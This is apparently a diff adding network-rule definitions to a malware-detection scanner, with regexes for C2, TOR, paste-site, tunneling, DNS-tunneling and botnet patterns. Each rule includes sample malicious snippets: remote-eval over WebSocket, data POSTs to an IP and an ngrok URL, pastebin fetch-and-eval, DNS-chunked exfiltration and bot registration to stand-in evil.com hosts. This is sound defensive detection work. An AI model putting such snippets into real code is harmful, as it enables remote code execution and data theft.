+                tacticId: types_1.MitreTactic.COMMAND_AND_CONTROL,
+                tacticName: 'Command and Control',
+                techniqueId: 'T1071',
+                techniqueName: 'Application Layer Protocol',
+                url: 'https://attack.mitre.org/techniques/T1071/'
+            }
+        ],
+        tags: ['c2', 'beacon', 'heartbeat', 'botnet', 'critical'],
+        enabled: true
+    },
+    {
+        id: 'MAL-NET-002',
+        name: 'C2 Communication - WebSocket Channel',
+        description: 'Detects WebSocket-based C2 communication channels.',
+        version: '2.0.0',
+        threatType: types_1.MalwareThreatType.C2_COMMUNICATION,
+        category: types_1.MalwareCategory.BOTNET,
+        languages: [types_1.SupportedLanguage.JAVASCRIPT, types_1.SupportedLanguage.TYPESCRIPT],
+        severity: types_1.MalwareSeverity.HIGH,
+        confidence: types_1.ConfidenceLevel.HIGH,
+        baseScore: 80,
+        patterns: [
+            {
+                type: types_1.PatternType.REGEX,
+                patternId: 'websocket-external',
+                pattern: 'new\\s+WebSocket\\s*\\([^)]*wss?:\\/\\/(?!localhost|127\\.0\\.0\\.1)',
+                flags: 'gis',
+                weight: 0.8,
+                description: 'WebSocket to external server'
+            },
+            {
+                type: types_1.PatternType.REGEX,
+                patternId: 'ws-onmessage-eval',
+                pattern: '\\.onmessage\\s*=\\s*[^;]*\\{[^}]*(?:eval|Function|exec)',
+                flags: 'gis',
+                weight: 1.0,
+                description: 'WebSocket message with eval'
+            },
+            {
+                type: types_1.PatternType.REGEX,
+                patternId: 'ws-command-handler',
+                pattern: '\\.onmessage[\\s\\S]*?JSON\\.parse[\\s\\S]*?(?:cmd|command|task)',
+                flags: 'gis',
+                weight: 0.9,
+                description: 'WebSocket command handler'
+            }
+        ],
+        maliciousExamples: [
+            {
+                code: `const ws = new WebSocket('wss://c2.evil.com/control');
+ws.onmessage = (event) => {
+  const cmd = JSON.parse(event.data);
+  if (cmd.type === 'exec') {
+    eval(cmd.code);
+  }
+};`,
+                language: types_1.SupportedLanguage.JAVASCRIPT,
+                isMalicious: true,
+                description: 'WebSocket C2 with command execution'
+            }
+        ],
+        impact: {
+            technical: 'Real-time bidirectional C2 communication channel.',
+            business: 'Enables real-time remote control and data exfiltration.',
+            affectedAssets: ['Network', 'System'],
+            dataAtRisk: ['Real-time data access']
+        },
+        remediation: {
+            summary: 'Close WebSocket connections and block C2 servers.',
+            steps: [
+                'Close unauthorized WebSocket connections',
+                'Block C2 server at firewall',
+                'Remove malicious code',
+                'Monitor WebSocket usage'
+            ]
+        },
+        tags: ['c2', 'websocket', 'real-time', 'high'],
+        enabled: true
+    }
+];
+// ============================================================================
+// SUSPICIOUS CONNECTION RULES
+// ============================================================================
+exports.suspiciousConnectionRules = [
+    {
+        id: 'MAL-NET-010',
+        name: 'Suspicious Connection - IP Address Hardcoded',
+        description: 'Detects hardcoded IP addresses in network connections, often used by malware.',
+        version: '2.0.0',
+        threatType: types_1.MalwareThreatType.SUSPICIOUS_NETWORK,
+        category: types_1.MalwareCategory.SUSPICIOUS,
+        languages: [
+            types_1.SupportedLanguage.JAVASCRIPT,
+            types_1.SupportedLanguage.TYPESCRIPT,
+            types_1.SupportedLanguage.PYTHON,
+            types_1.SupportedLanguage.PHP
+        ],
+        severity: types_1.MalwareSeverity.MEDIUM,
+        confidence: types_1.ConfidenceLevel.MEDIUM,
+        baseScore: 60,
+        patterns: [
+            {
+                type: types_1.PatternType.REGEX,
+                patternId: 'fetch-ip',
+                pattern: '(?:fetch|axios|request|http)\\s*\\([^)]*[\'"]https?:\\/\\/\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}',
+                flags: 'gis',
+                weight: 0.8,
+                description: 'HTTP request to IP address'
+            },
+            {
+                type: types_1.PatternType.REGEX,
+                patternId: 'socket-ip',
+                pattern: '(?:socket|connect)\\s*\\([^)]*\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}',
+                flags: 'gi',
+                weight: 0.9,
+                description: 'Socket connection to IP'
+            }
+        ],
+        falsePositivePatterns: [
+            {
+                type: types_1.PatternType.REGEX,
+                patternId: 'localhost-ip',
+                pattern: '127\\.0\\.0\\.1|0\\.0\\.0\\.0',
+                flags: 'gi',
+                weight: 0.4,
+                description: 'Localhost addresses'
+            },
+            {
+                type: types_1.PatternType.REGEX,
+                patternId: 'config-var',
+                pattern: 'config\\.|process\\.env\\.|settings\\.',
+                flags: 'gi',
+                weight: 0.3,
+                description: 'Configuration variables'
+            }
+        ],
+        maliciousExamples: [
+            {
+                code: `fetch('http://45.33.32.156:8080/data', { method: 'POST', body: sensitiveData });`,
+                language: types_1.SupportedLanguage.JAVASCRIPT,
+                isMalicious: true,
+                description: 'Hardcoded IP data exfiltration'
+            }
+        ],
+        impact: {
+            technical: 'Direct connection to IP address bypassing DNS.',
+            business: 'Potential data exfiltration or C2 communication.',
+            affectedAssets: ['Network connections'],
+            dataAtRisk: ['Transmitted data']
+        },
+        remediation: {
+            summary: 'Investigate IP addresses and remove unauthorized connections.',
+            steps: [
+                'Identify the IP addresses and their purpose',
+                'Check IP reputation',
+                'Remove unauthorized connections',
+                'Use domain names with proper validation'
+            ]
+        },
+        tags: ['suspicious-network', 'hardcoded-ip', 'medium'],
+        enabled: true
+    },
+    {
+        id: 'MAL-NET-011',
+        name: 'Suspicious Connection - TOR/I2P/Anonymous Network',
+        description: 'Detects connections to TOR, I2P, or other anonymizing networks.',
+        version: '2.0.0',
+        threatType: types_1.MalwareThreatType.SUSPICIOUS_NETWORK,
+        category: types_1.MalwareCategory.SUSPICIOUS,
+        languages: [
+            types_1.SupportedLanguage.JAVASCRIPT,
+            types_1.SupportedLanguage.TYPESCRIPT,
+            types_1.SupportedLanguage.PYTHON
+        ],
+        severity: types_1.MalwareSeverity.HIGH,
+        confidence: types_1.ConfidenceLevel.HIGH,
+        baseScore: 75,
+        patterns: [
+            {
+                type: types_1.PatternType.REGEX,
+                patternId: 'onion-domain',
+                pattern: '\\.onion[/\'"]',
+                flags: 'gi',
+                weight: 1.0,
+                description: 'TOR .onion domain'
+            },
+            {
+                type: types_1.PatternType.REGEX,
+                patternId: 'i2p-domain',
+                pattern: '\\.i2p[/\'"]',
+                flags: 'gi',
+                weight: 1.0,
+                description: 'I2P domain'
+            },
+            {
+                type: types_1.PatternType.REGEX,
+                patternId: 'tor-proxy',
+                pattern: 'socks[45]?:\\/\\/(?:localhost|127\\.0\\.0\\.1):(?:9050|9150)',
+                flags: 'gi',
+                weight: 1.0,
+                description: 'TOR SOCKS proxy'
+            }
+        ],
+        maliciousExamples: [
+            {
+                code: `const response = await fetch('http://evil3rz44k4pbcm.onion/api/data');`,
+                language: types_1.SupportedLanguage.JAVASCRIPT,
+                isMalicious: true,
+                description: 'Connection to TOR hidden service'
+            }
+        ],
+        impact: {
+            technical: 'Anonymous network usage to hide communication.',
+            business: 'Difficult to trace malicious activity.',
+            affectedAssets: ['Network traffic'],
+            dataAtRisk: ['Untraced data exfiltration']
+        },
+        remediation: {
+            summary: 'Block anonymous network connections and investigate usage.',
+            steps: [
+                'Block TOR/I2P at network level',
+                'Remove anonymous network code',
+                'Investigate purpose of anonymous communication',
+                'Monitor for similar patterns'
+            ]
+        },
+        tags: ['tor', 'i2p', 'anonymous', 'suspicious', 'high'],
+        enabled: true
+    },
+    {
+        id: 'MAL-NET-012',
+        name: 'Suspicious Connection - Pastebin/Text Hosting',
+        description: 'Detects connections to paste sites often used for C2 or payload hosting.',
+        version: '2.0.0',
+        threatType: types_1.MalwareThreatType.SUSPICIOUS_NETWORK,
+        category: types_1.MalwareCategory.SUSPICIOUS,
+        languages: [
+            types_1.SupportedLanguage.JAVASCRIPT,
+            types_1.SupportedLanguage.TYPESCRIPT,
+            types_1.SupportedLanguage.PYTHON,
+            types_1.SupportedLanguage.PHP
+        ],
+        severity: types_1.MalwareSeverity.MEDIUM,
+        confidence: types_1.ConfidenceLevel.HIGH,
+        baseScore: 68,
+        patterns: [
+            {
+                type: types_1.PatternType.REGEX,
+                patternId: 'pastebin-fetch',
+                pattern: '(?:fetch|axios|request|urllib|curl)\\s*\\([^)]*(?:pastebin\\.com|hastebin\\.com|ghostbin\\.com|rentry\\.co|dpaste\\.org)',
+                flags: 'gis',
+                weight: 1.0,
+                description: 'Connection to paste site'
+            },
+            {
+                type: types_1.PatternType.REGEX,
+                patternId: 'raw-paste',
+                pattern: 'pastebin\\.com\\/raw\\/|raw\\.githubusercontent\\.com',
+                flags: 'gi',
+                weight: 0.9,
+                description: 'Raw paste content fetch'
+            }
+        ],
+        maliciousExamples: [
+            {
+                code: `const payload = await fetch('https://pastebin.com/raw/Ej8kL9mN').then(r => r.text());
+eval(payload);`,
+                language: types_1.SupportedLanguage.JAVASCRIPT,
+                isMalicious: true,
+                description: 'Pastebin payload loading'
+            }
+        ],
+        impact: {
+            technical: 'Uses public paste sites for payload hosting or C2.',
+            business: 'Common malware delivery mechanism.',
+            affectedAssets: ['Application'],
+            dataAtRisk: ['Depends on payload']
+        },
+        remediation: {
+            summary: 'Block paste site connections and remove payload loading code.',
+            steps: [
+                'Remove paste site connections',
+                'Analyze fetched content',
+                'Block paste sites at network level if appropriate'
+            ]
+        },
+        tags: ['pastebin', 'paste-site', 'c2', 'medium'],
+        enabled: true
+    },
+    {
+        id: 'MAL-NET-013',
+        name: 'Suspicious Connection - Tunneling Service',
+        description: 'Detects connections to ngrok, serveo, or other tunneling services.',
+        version: '2.0.0',
+        threatType: types_1.MalwareThreatType.SUSPICIOUS_NETWORK,
+        category: types_1.MalwareCategory.SUSPICIOUS,
+        languages: [
+            types_1.SupportedLanguage.JAVASCRIPT,
+            types_1.SupportedLanguage.TYPESCRIPT,
+            types_1.SupportedLanguage.PYTHON
+        ],
+        severity: types_1.MalwareSeverity.MEDIUM,
+        confidence: types_1.ConfidenceLevel.HIGH,
+        baseScore: 65,
+        patterns: [
+            {
+                type: types_1.PatternType.REGEX,
+                patternId: 'ngrok-domain',
+                pattern: '(?:ngrok\\.io|serveo\\.net|localhost\\.run|localtunnel\\.me)',
+                flags: 'gi',
+                weight: 1.0,
+                description: 'Tunneling service domain'
+            }
+        ],
+        falsePositivePatterns: [
+            {
+                type: types_1.PatternType.REGEX,
+                patternId: 'dev-comment',
+                pattern: '\\/\\/.*(?:ngrok|tunnel)|#.*(?:ngrok|tunnel)',
+                flags: 'gi',
+                weight: 0.3,
+                description: 'Development comment'
+            }
+        ],
+        maliciousExamples: [
+            {
+                code: `fetch('https://abc123.ngrok.io/exfil', { method: 'POST', body: data });`,
+                language: types_1.SupportedLanguage.JAVASCRIPT,
+                isMalicious: true,
+                description: 'Data exfiltration via ngrok tunnel'
+            }
+        ],
+        impact: {
+            technical: 'Uses tunneling services to bypass network restrictions.',
+            business: 'Data exfiltration bypassing firewall rules.',
+            affectedAssets: ['Network security'],
+            dataAtRisk: ['Exfiltrated data']
+        },
+        remediation: {
+            summary: 'Block tunneling services and remove connections.',
+            steps: [
+                'Remove tunneling service connections',
+                'Block tunneling domains at network level',
+                'Investigate data being transmitted'
+            ]
+        },
+        tags: ['ngrok', 'tunnel', 'bypass', 'medium'],
+        enabled: true
+    }
+];
+// ============================================================================
+// DNS TUNNELING RULES
+// ============================================================================
+exports.dnsTunnelingRules = [
+    {
+        id: 'MAL-NET-020',
+        name: 'DNS Tunneling - Subdomain Data Encoding',
+        description: 'Detects patterns indicative of DNS tunneling for data exfiltration.',
+        version: '2.0.0',
+        threatType: types_1.MalwareThreatType.DNS_TUNNELING,
+        category: types_1.MalwareCategory.BOTNET,
+        languages: [
+            types_1.SupportedLanguage.JAVASCRIPT,
+            types_1.SupportedLanguage.TYPESCRIPT,
+            types_1.SupportedLanguage.PYTHON
+        ],
+        severity: types_1.MalwareSeverity.HIGH,
+        confidence: types_1.ConfidenceLevel.MEDIUM,
+        baseScore: 72,
+        patterns: [
+            {
+                type: types_1.PatternType.REGEX,
+                patternId: 'dns-lookup-data',
+                pattern: 'dns\\.(?:resolve|lookup)\\s*\\([^)]*[+]|dns\\.resolve[\\s\\S]*?(?:btoa|base64|hex)',
+                flags: 'gis',
+                weight: 0.9,
+                description: 'DNS lookup with data encoding'
+            },
+            {
+                type: types_1.PatternType.REGEX,
+                patternId: 'subdomain-chunking',
+                pattern: '\\.(?:match|substring|slice)\\s*\\([^)]*\\)[\\s\\S]{0,50}\\.dns|\\.[a-z0-9]{20,}\\.',
+                flags: 'gis',
+                weight: 0.7,
+                description: 'Subdomain data chunking'
+            },
+            {
+                type: types_1.PatternType.REGEX,
+                patternId: 'python-dns-tunnel',
+                pattern: 'dns\\.resolver[\\s\\S]*?query\\s*\\([^)]*\\+',
+                flags: 'gis',
+                weight: 0.8,
+                description: 'Python DNS query with data'
+            }
+        ],
+        maliciousExamples: [
+            {
+                code: `const data = btoa(sensitiveInfo);
+for (let i = 0; i < data.length; i += 63) {
+  const chunk = data.substring(i, i + 63);
+  dns.resolve(\`\${chunk}.exfil.evil.com\`, 'TXT', () => {});
+}`,
+                language: types_1.SupportedLanguage.JAVASCRIPT,
+                isMalicious: true,
+                description: 'DNS tunneling data exfiltration'
+            }
+        ],
+        impact: {
+            technical: 'Uses DNS protocol for covert data exfiltration.',
+            business: 'Bypasses traditional network monitoring.',
+            affectedAssets: ['DNS traffic', 'Network'],
+            dataAtRisk: ['Exfiltrated sensitive data']
+        },
+        remediation: {
+            summary: 'Monitor DNS traffic and block DNS tunneling domains.',
+            steps: [
+                'Remove DNS tunneling code',
+                'Implement DNS monitoring for anomalous queries',
+                'Block identified tunneling domains',
+                'Use DNS security solutions'
+            ]
+        },
+        mitreAttack: [
+            {
+                tacticId: types_1.MitreTactic.COMMAND_AND_CONTROL,
+                tacticName: 'Command and Control',
+                techniqueId: 'T1071.004',
+                techniqueName: 'DNS',
+                url: 'https://attack.mitre.org/techniques/T1071/004/'
+            }
+        ],
+        tags: ['dns-tunneling', 'exfiltration', 'covert-channel', 'high'],
+        enabled: true
+    }
+];
+// ============================================================================
+// BOTNET RULES
+// ============================================================================
+exports.botnetRules = [
+    {
+        id: 'MAL-NET-030',
+        name: 'Botnet - Client Registration',
+        description: 'Detects bot registration patterns with C2 server.',
+        version: '2.0.0',
+        threatType: types_1.MalwareThreatType.BOTNET,
+        category: types_1.MalwareCategory.BOTNET,
+        languages: [
+            types_1.SupportedLanguage.JAVASCRIPT,
+            types_1.SupportedLanguage.TYPESCRIPT,
+            types_1.SupportedLanguage.PYTHON
+        ],
+        severity: types_1.MalwareSeverity.CRITICAL,
+        confidence: types_1.ConfidenceLevel.HIGH,
+        baseScore: 85,
+        patterns: [
+            {
+                type: types_1.PatternType.REGEX,
+                patternId: 'bot-registration',
+                pattern: '(?:bot[-_]?id|client[-_]?id|uuid)[\\s\\S]*?(?:fetch|post|send)[\\s\\S]*?(?:register|join|connect)',
+                flags: 'gis',
+                weight: 0.9,
+                description: 'Bot registration pattern'
+            },
+            {
+                type: types_1.PatternType.REGEX,
+                patternId: 'bot-info-collect',
+                pattern: '(?:navigator\\.userAgent|os\\.platform|hostname)[\\s\\S]*?(?:fetch|post|send)',
+                flags: 'gis',
+                weight: 0.7,
+                description: 'System info collection and send'
+            }
+        ],
+        maliciousExamples: [
+            {
+                code: `const botId = crypto.randomUUID();
+const info = {
+  id: botId,
+  platform: navigator.platform,
+  ua: navigator.userAgent
+};
+fetch('https://botnet.evil.com/register', {
+  method: 'POST',
+  body: JSON.stringify(info)
+});`,
+                language: types_1.SupportedLanguage.JAVASCRIPT,
+                isMalicious: true,
+                description: 'Bot registration with system info'
+            }
+        ],
+        impact: {
+            technical: 'Enrolls system as bot in botnet.',
+            business: 'System becomes part of criminal infrastructure.',
+            affectedAssets: ['System', 'Network'],
+            dataAtRisk: ['System resources', 'Network bandwidth']
+        },
+        remediation: {
+            summary: 'Remove botnet code and block C2 infrastructure.',
+            steps: [
+                'Remove bot registration code',
+                'Block botnet C2 servers',
+                'Scan for additional malware',
+                'Reset credentials'
+            ]
+        },
+        tags: ['botnet', 'registration', 'c2', 'critical'],
+        enabled: true
+    }
+];
+// ============================================================================
+// EXPORT ALL NETWORK RULES
+// ============================================================================
+exports.networkRules = [
+    ...exports.c2Rules,
+    ...exports.suspiciousConnectionRules,
+    ...exports.dnsTunnelingRules,
+    ...exports.botnetRules
+];
+exports.default = exports.networkRules;
+//# sourceMappingURL=network.js.map